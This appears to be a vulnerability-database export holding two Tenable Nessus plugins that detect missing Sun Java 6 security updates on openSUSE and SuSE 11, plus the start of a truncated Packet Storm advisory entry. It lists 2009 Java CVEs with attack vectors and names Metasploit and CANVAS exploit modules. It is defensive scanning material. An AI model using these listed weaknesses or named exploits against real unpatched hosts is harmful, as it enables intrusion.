java-1_6_0-sun-1541.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42855);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)\");\n script_summary(english:\"Check for the java-1_6_0-sun-1541 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensi ons in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital si gnatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP header s, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2 _24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-demo-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-devel-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:11:45", "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\n - The Java Web Start Installer in Sun Java SE in JDK and\n JRE 6 before Update 17 does not properly use security\n model permissions when removing installer extensions,\n which allows remote attackers to execute arbitrary code\n by modifying a certain JNLP file to have a URL field\n that poi nts to an unintended trusted application, aka\n Bug Id 6872824. (CVE-2009-3866)\n\n - Stack-based buffer overflow in the\n HsbParser.getSoundBank function in Sun Java SE in JDK\n and JRE 5.0 before Update 22, JDK and JRE 6 before\n Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\n and JRE 1.4.x before 1.4.2_24 allows remote attackers to\n execute arbitrary code via a long file: URL in an\n argument, aka Bug Id 6854303. (CVE-2009-3867)\n\n - Stack-based buffer overflow in the setDiffICM function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_ 24 allows remote attackers to execute\n arbitrary code via a crafted argument, aka Bug Id\n 6872357. (CVE-2009-3869)\n\n - Heap-based buffer overflow in the setBytePixels function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4. 2_24 allows remote attackers to execute\n arbitrary code via crafted arguments, aka Bug Id\n 6872358. (CVE-2009-3871)\n\n - Integer overflow in the JPEGImageReader implementation\n in the ImageI/O component in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n and SDK and JRE 1.4.x before 1.4.2_24 allows remote\n attackers to execute arbitrary code via large subsample\n dimensi ons in a JPEG file that triggers a heap-based\n buffer overflow, aka Bug Id 6874643. (CVE-2009-3874)\n\n - The MessageDigest.isEqual function in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 befor e Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_24 allows remote attackers to spoof\n HMAC-based digital si gnatures, and possibly bypass\n authentication, via unspecified vectors related to\n 'timing attack vulnerabilities,' aka Bug Id 6863503.\n (CVE-2009-3875)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1 _27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted DER\n encoded data, which is not properly decoded by the ASN.1\n DER input stream parser, aka Bug Id 6864911.\n (CVE-2009-3876)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1 _27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted HTTP\n header s, which are not properly parsed by the ASN.1 DER\n input stream parser, aka Bug Id 6864911. (CVE-2009-3877)\n\n - The Java Update functionality in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22 and JDK and JRE 6 before Update 17,\n when a non-English version of Windows is used, does not\n retrieve available new JRE versions, which allows remote\n attackers to lev erage vulnerabilities in older releases\n of this software, aka Bug Id 6869694. (CVE-2009-3864)\n\n - The launch method in the Deployment Toolkit plugin in\n Java Runtime Environment (JRE) in Sun Java SE in JDK and\n JRE 6 before Update 17 allows remote attackers to\n execute arbitrary commands via a crafted web page, aka\n Bug Id 6869752. (CVE-2009-3865)\n\n - Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK and JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x be fore 1.4.2_24 does\n not properly parse color profiles, which allows remote\n attackers to gain privileges via a crafted image file,\n aka Bug Id 6862970. (CVE-2009-3868)\n\n - Unspecified vulnerability in the JPEG JFIF Decoder in\n Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK a nd JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\n remote attackers to gain privileges via a crafted image\n file, aka Bug Id 6862969. (CVE-2009-3872)\n\n - The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, and\n SDK and JRE 1.4.x before 1.4.2 _24 allows remote\n attackers to gain privileges via a crafted image file,\n related to a 'quanization problem,' aka Bug Id 6862968.\n (CVE-2009-3873)", "edition": 25, "published": "2009-11-19T00:00:00", "title": "SuSE 11 Security Update : Sun Java 1.6.0 (SAT Patch Number 1542)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-src", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-jdbc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-alsa", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-plugin", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-demo"], "id": "SUSE_11_JAVA-1_6_0-SUN-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42857);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 11 Security Update : Sun Java 1.6.0 (SAT Patch Number 1542)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\n - The Java Web Start Installer in Sun Java SE in JDK and\n JRE 6 before Update 17 does not properly use security\n model permissions when removing installer extensions,\n which allows remote attackers to execute arbitrary code\n by modifying a certain JNLP file to have a URL field\n that poi nts to an unintended trusted application, aka\n Bug Id 6872824. (CVE-2009-3866)\n\n - Stack-based buffer overflow in the\n HsbParser.getSoundBank function in Sun Java SE in JDK\n and JRE 5.0 before Update 22, JDK and JRE 6 before\n Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\n and JRE 1.4.x before 1.4.2_24 allows remote attackers to\n execute arbitrary code via a long file: URL in an\n argument, aka Bug Id 6854303. (CVE-2009-3867)\n\n - Stack-based buffer overflow in the setDiffICM function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_ 24 allows remote attackers to execute\n arbitrary code via a crafted argument, aka Bug Id\n 6872357. (CVE-2009-3869)\n\n - Heap-based buffer overflow in the setBytePixels function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4. 2_24 allows remote attackers to execute\n arbitrary code via crafted arguments, aka Bug Id\n 6872358. (CVE-2009-3871)\n\n - Integer overflow in the JPEGImageReader implementation\n in the ImageI/O component in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n and SDK and JRE 1.4.x before 1.4.2_24 allows remote\n attackers to execute arbitrary code via large subsample\n dimensi ons in a JPEG file that triggers a heap-based\n buffer overflow, aka Bug Id 6874643. (CVE-2009-3874)\n\n - The MessageDigest.isEqual function in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 befor e Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_24 allows remote attackers to spoof\n HMAC-based digital si gnatures, and possibly bypass\n authentication, via unspecified vectors related to\n 'timing attack vulnerabilities,' aka Bug Id 6863503.\n (CVE-2009-3875)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1 _27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted DER\n encoded data, which is not properly decoded by the ASN.1\n DER input stream parser, aka Bug Id 6864911.\n (CVE-2009-3876)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1 _27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted HTTP\n header s, which are not properly parsed by the ASN.1 DER\n input stream parser, aka Bug Id 6864911. (CVE-2009-3877)\n\n - The Java Update functionality in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22 and JDK and JRE 6 before Update 17,\n when a non-English version of Windows is used, does not\n retrieve available new JRE versions, which allows remote\n attackers to lev erage vulnerabilities in older releases\n of this software, aka Bug Id 6869694. (CVE-2009-3864)\n\n - The launch method in the Deployment Toolkit plugin in\n Java Runtime Environment (JRE) in Sun Java SE in JDK and\n JRE 6 before Update 17 allows remote attackers to\n execute arbitrary commands via a crafted web page, aka\n Bug Id 6869752. (CVE-2009-3865)\n\n - Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK and JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x be fore 1.4.2_24 does\n not properly parse color profiles, which allows remote\n attackers to gain privileges via a crafted image file,\n aka Bug Id 6862970. (CVE-2009-3868)\n\n - Unspecified vulnerability in the JPEG JFIF Decoder in\n Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK a nd JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\n remote attackers to gain privileges via a crafted image\n file, aka Bug Id 6862969. (CVE-2009-3872)\n\n - The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, and\n SDK and JRE 1.4.x before 1.4.2 _24 allows remote\n attackers to gain privileges via a crafted image file,\n related to a 'quanization problem,' aka Bug Id 6862968.\n (CVE-2009-3873)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3864.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3865.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3866.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1542.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-demo-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-demo-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:43", "description": "", "published": "2009-12-30T00:00:00", "type": "packetstorm", "title": "Netragard Security Advisory 2009-12-19", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3728", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3884", "CVE-2009-3868"], "modified": "2009-12-30T00:00:00", "id": "PACKETSTORM:84499", "href": "https://packetstormsecurity.com/files/84499/Netragard-Security-Advisory-2009-12-19.html", "sourceData": "`[Advisory Summary] \n----------------------------------------------------------------------- \nAdvisory Author : Adriel T. Desautels \nResearcher : Kevin Finisterre \nAdvisory ID : NETRAGARD-20091219 \nProduct Name : Mac OS X Java Runtime 